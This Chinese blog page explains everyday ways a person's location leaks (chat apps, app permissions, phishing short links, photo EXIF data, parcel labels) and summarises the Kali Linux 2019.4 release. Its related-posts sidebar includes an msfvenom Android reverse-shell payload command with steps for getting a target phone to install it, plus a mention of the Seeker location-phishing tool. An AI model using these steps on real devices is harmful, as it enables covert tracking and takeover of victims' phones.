kali镜像_解密:为什么个人位置信息泄露?【附:新版kali】

最新推荐文章于 2022-11-07 16:56:54 发布
最新推荐文章于 2022-11-07 16:56:54 发布
阅读量495 收藏 1
点赞数
文章标签: kali镜像

我发现知乎上有很多这类的问题,手机被监控了怎么办?手机号可以定位吗?我的居住地被黑客知道了怎么办?等等等等,并且每天都有新的、类似的问题发布,我就搞不懂了,为什么那么多人会有这样的疑问呢?

就在这时,同事小王:“我也觉得有人在跟踪我一样,我又没做啥子,不作亏心事不怕鬼敲门。”

旁边小李:“前两天看新闻,说手机上装了啥子软件app,他老婆就可以看到他每天干啥子,好恐怖哦,幸好我单身。”

我:“你们在说啥子哦,听不懂。”

今天我们就来解密位置信息问题。

一:QQ聊天泄露定位?

A:“我们已经是好友啦,一起来聊天吧!”
B:“你是?”
A:“你家住在XX市XX区XX街?”
B:“¥%&#,你怎么知道?”

这是怎么回事呢?

让我们来细细分析,首先,自己的个人资料有没有泄露自己的位置信息呢?检查一下。。。

e4cdc7c9d9fbfb5203ba3f8ebb1a99d5.png

好吧,排除(位置乱填的 )

其次,QQ本身有没有把你出卖呢?

3b5a0f4cd890b3a40b0644bb3d882252.png

哦豁,成功的把我出卖(我还能说什么,怪我咯!)。。。

还有一些特殊的QQ,简单讲一下吧。

eba6dcf04ced937a87b158e6c9dbd4d4.png

可以在聊天的时候获取你的 IP信息、定位、GPS、经纬度等等。

虽然这些东西抓包可能都可以获取到,但是随便聊两句天别人就知道你在哪儿是真的挺可怕的。

二:APP风波、未知链接?

来看看前段时间的这个新闻。

944c331858fc7f7af93b5750bfbfcd25.png

细思极恐,每天刷着手机,突然一天多了双眼睛在看你?

你站在桥上看风景,看风景的人在楼上看你。

亦或是,当你安装某一 APP 时,向你提出权限请求(有些软件不允许就直接不让安装或不让你用)。

3c2b6cd8d11e313130c3f918bf9fd530.png

所以,不法分子,有通过这样的权限获取机制获取你的位置信息(比如,一些获取完信息就闪退的软件)。

“一刀满级,三秒土豪”“屠龙宝刀点击就送”???

相信你们都知道这些广告,一些钓鱼邮件、短信之类的也存在这种未知链接。

9fdae2f21e899eb1223816122637c1a5.png

光从表名上看完全看不出来什么危险,但是里面藏着危机重重。

网上有很多 url 短链接生成网站,再长的钓鱼链接都能变短,让你肉眼根本无法看穿,小手轻轻一点,别人就知道你在哪里了。

三:发朋友圈泄露

先不说照片上显示你在哪里了,如今很多手机相机都默认开启了地理位置收集功能。

846ab1d1cea8a85b1ce77b810f5e59bc.png

也就是说,你的每一张照片上,都有你的拍摄地的信息,包括经纬度、时间日期等等。

用 EXIF 查看器打开就可以看到。

可交换图像文件格式,是专门为数码相机的照片设定的,可以记录数码照片的属性信息和拍摄数据。

dc12c91c0ce96d2567d314663ee5ba37.png

然后通过经纬度,就可以大概知道你在哪里了。

1c85668cd5caa4a70ca282a78995c5f3.png

四:快递盒子、外卖小票等等

很多人可能都有这样的习惯,快递拆了就随手扔了盒子,当然,你的一些个人信息也就这样随手扔掉了。所以,我们都应该有这样的习惯:

8669f5e0d9e44d6335f7998bbbe21be9.png

一直有个疑问,有些快递点总是会把快递上的一个贴纸给撕下来,放一个大盒子里,也不知道是不是规定了要收集还在要上交之类的,搞不懂。。。最好不要像这样:

3b2f1d433546c6c906488911c11b0458.png

所以,处理好你的小票、快递盒等等。

综合以上所述,你大概知道为什么感觉自己被监控了吗?知道为什么别人知道你在哪儿了吗?

提高安全意识,保护好自己。当然,也不止以上所说的这些情况,说不定还有别的地方把你“出卖”了。

kali

近日,kali 发布最新版本了 2019.4 版本

官网下载:https://www.kali.org/downloads/

镜像下载:http://mirrors.163.com/kali-images/kali-2019.4/

这是 Kali Linux 渗透测试平台的最新版本。新版本包括几个新功能,包括新的默认桌面环境,新主题和供在公共场所进行评估工作的渗透测试者使用的新模式—— undercover模式。

新版 kali 开机(炫酷max):

e5d9b21edd2436ed5fd2df7c4179fce4.gif

从 Gnome 移至 Xfce

2019.4 版本中最值得注意的方面是 Kali 从 Gnome 环境迁移到 Xfce 以解决一些已知问题。新环境带来的具体改进包括:

01.改进的性能

Gnome 环境是具有许多功能的全功能桌面环境。但是,所有功能都带有开销,这对于像 Kali 这样的发行版来说通常是没有用的。转向更轻量级的 Xfce 环境可以解决这些问题,从而提供一个更符合典型 Kali 用户需求的环境。

02.统一的UI

因为 Kali 可以在从裸机到高端笔记本电脑的所有设备上运行,所以低端 ARM 版本通常具有与其他部署不同的 UI。现在,作者为所有 Kali 发行版提供了标准化的 UI。

undercover 模式

假设在公共场所工作,你可能不希望独特且显眼的 Kali 壁纸让所有人都看到你在使用 kali。比如在教室上计算机方面的课的时候,开启 kali 就会吸引来同学们异样的眼光。。。

开发人员编写了一个小脚本,它可以把你的 Kali 主题更改为默认的 Windows 主题。(可以“为所欲为”的在教室玩 kali 了~)这样,你就可以“隐身”工作。等方便的时候,再次运行脚本,就可以切换回 Kali 主题。

“隐身”演示:

5ed703770d4a785ff5c5ba04e33af9b5.gif

今天的内容就简单介绍到这里了。更多有关内容请前往 二向箔安全 进行学习,最近推出了一系列免费的网络安全技能包,有关CTF、渗透测试、网络攻防、黑客技巧尽在其中,学它涨姿势 。

b5467b0b0ec52e6ab05f455389ddcd92.png
weixin_39736047
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
使用 Kali Linux 跟踪任何设备位置
weixin_51387754的博客
08-13 5443
标题如果您的手机在某处丢失或被某人偷走了,您可以使用此技巧, 或者如果您的兄弟姐妹/朋友/家人失踪并使用他们的电话,那么您可以使用此技巧来定位并找到他们, 本视频仅用于教育目的,请不要做错事。 这里是软件链接 NGROK - https://ngrok.com/ SEEKER - https://github.com/thewhiteh4t/seeker 视频链接https://www.youtube.com/watch?v=DonZ63aVDK4&t=307s 手机电脑可上外网,kali虚拟机20
kali下使用seek追踪定位IP地址(渗透笔记)
最新发布
weixin_43899811的博客
11-27 1803
在整个实验中,最头疼最无语的还是一开始kali版本选择上的问题,一定要选择kali2023,并且在清华大学镜像源中下载镜像。作为攻击者,我认为这种攻击方式还需要再进一步完善社工方面的问题,例如如何实现手机不提示开启位置功能,如何实现苹果端显示位置,如何不提示该网址是伪装网址等等,值得我们考虑和深思。作为被攻击者,我们一定在日常使用互联网中,不要随意打开陌生链接!那么最后,着重强调:此篇文章仅供技术交流和探讨,严禁利用该手段进行违法行为,出现一切问题后果自负!不足之处敬请批评指正!
kali控制安卓(拍照、通讯录、GPS等)
weixin_45511599的博客
10-06 1万+
1.生成apk(目标手机安装) msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.176 LPORT=8888 R > tst.apk 注意:ip地址是kali的,不是目标手机的 2.开启kali自带的web服务器 sudo service apache2 start 3.将apk拷贝到服务器根目录 sudo cp tst.apk /var/www/html 4.目标手机下载安装txt.apk 方法一:目标手机直接在网址
kali获取任意设备的位置信息
ztK63LrD的博客
04-23 6150
kali获取位置信息
利用基站定位手机
热门推荐
William234的博客
12-16 2万+
                                                                                                                                                                    利用基站定位手机             在手机拨号键盘处输入...
kali_patched_docker:完整修补的Kali Docker映像
02-16
kali_patched_docker 完整修补的Kali Docker映像。
my_kali_dockerfile:kali的简单dockerfile,用于ctf或pentesting
03-28
my_kali_dockerfile kali的简单dockerfile,用于ctf或pentesting 去做将历史记录外壳保存在本地计算机中。 //完全的为ctf建立安全的网络。 成为非root用户。 //完全的要求输入新密码或/和用户名即可启动图像。 使无...
Kali-NotepadPlusPlus_Theme:记事本++的Kali主题
05-23
Kali-NotepadPlusPlus_Theme 记事本++的Kali主题 要安装此Notepad ++主题,请执行以下操作: 下载XML文件并将其移至Notepad ++主题文件夹(通常为C:\ Program Files \ Notepad ++ \ themes \或C:\ Program Files...
packer-kali_linux:这是一个存储库,用于每月为hashicorp创建一个新的kali vagrant box流程。
02-06
自动Kali Vagrant Box 注意:不是Vagrant和Kali的正式OffSec实施。介绍幻灯片-https: 视频(即将推出) 博客文章第1部分: : 这篇博客文章是有关我要将此仓库用于什么的高级概述第2部分: : 这篇博客文章深入探讨...
Android_Pentest_Tools:适用于Kali Linux的Android渗透测试工具
05-01
Android Pentest工具 专为kali linux设计javaFX + Spring boot + bash脚本一键完成所有常规步骤更新1.0版发布了!建造mvn clean package跑步java -jar target/android-pentest-tool*.jar去做: 添加安装步骤添加功能...
基于linux的GPS定位数据的接收与解析
01-14
在linux操作系统下,运用串口通信,来实现GPS的接收与定位数据解析
kali_testing:只是我为kali做的东西,还有我无聊时做的一些随机东西
02-13
kali_testing 只是我为kali制作的东西,还有一些我在无聊的Python 3.8x时制作的随机的东西。一些cpp我并没有真正使用它,一些html就是很多测试,并确保运行pornstar.py:')
Kali_Linux iso镜像在Vmware中如何安装(安装教程)???
05-11
在安装Kali Linux ISO镜像的过程中,我们首先需要理解Kali Linux是什么以及为什么要在VMware中进行安装。Kali Linux是一款基于Debian的开源操作系统,专门设计用于渗透测试和网络安全审计。它包含了大量预装的渗透...
Kali_Setup:Epic Kali脚本,Oracle和其他Thinfs需要尽快添加
05-14
Kali_Setup Epic Kali脚本,oracle和其他Thinfs需要尽快添加。 该脚本已在kali 1.1上进行了测试,已对其进行了修改以修复Kali 2.0中的某些细节,并已开发为向Kali添加某些方面
kali_install:Bash脚本,用于在新的kali机器上安装所有必需的工具
02-26
kali_install Bash脚本用于在新的kali机器上安装所有必需的工具。工具威盛APT exploitdb exploitdb文件virtualbox-guest-x11 虚拟环境apt-transport-https 猛击者终结者卷曲python3-pip 树pipx libaio1 python3-dev ...
实验二:网络嗅探与身份认证
ANYOUZHEN的博客
11-07 1139
它支持多种不同类型的系统架构,包括Unix、Linux、Windows、DOS模式、BeOS和OpenVMS,主要目的是破解不够牢固的Unix/Linux系统密码。了解了arp欺骗原理及危害,学习了钓鱼dns劫持,arp欺骗防范手段,以及密码设置的重要性,增强密码强度,最后个人感觉对wireshark抓包不够熟练,还得多加学习wireshark使用。John the Ripper免费的开源软件,是一个快速的密码破解工具,用于在已知密文的情况下尝试破解出明文的破解密码软件,支持大多数的。
picoCTF2020-RE
煤矿路口西的博客
11-11 373
picoCTF Reverse Engineering vault-door-training [vault-door-training](Your mission is to enter Dr. Evil’s laboratory and retrieve the blueprints for his Doomsday Project. The laboratory is protected by a series of locked vault doors. Each door is contro.
一文教你Kali信息收集
大河之犬的博客
06-26 2971
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证和渗透测试 和 黑客攻防。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的用于取证的Linux发行版。
kali简单操作(从入门到入狱)
javaProgrammerr的博客
03-08 4411
nmap 当使用nmap扫描一个端口的时候 PORT: 端口 STATE: 端口状态 SERVICE: 端口服务 open: 端口是开放的 closed: 端口是关闭的 filtered: 端口被防火墙IDS/IPS屏蔽,无法确定状态 open|filtered: 端口是开放的或被过滤 指令写法: nmap IP地址 xhydra 可以利用它来对众多协议进行口令.账号.密码的爆破. 支持FTP,MYSQL,SMTP,TELNET,SSH等众多的协议爆破. 使用方法 在终端中输入命令行xhydra 菜单栏一
kali Linux 基本命令行大全
10-12
kali Linux 基本命令行大全

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值